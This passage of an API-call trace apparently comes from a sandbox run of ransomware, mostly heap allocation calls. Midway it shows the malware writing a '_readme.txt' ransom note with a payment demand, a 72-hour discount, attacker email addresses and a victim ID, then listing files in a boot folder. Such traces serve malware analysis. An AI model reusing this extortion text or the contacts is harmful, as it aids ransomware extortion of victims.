lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.903] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0200.903] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.904] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.904] PathFindFileNameW (pszPath="") returned="" [0200.904] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.904] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.904] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.904] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.904] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0200.904] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0200.904] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.905] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.905] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.905] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.905] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.905] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.905] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.905] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.905] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) 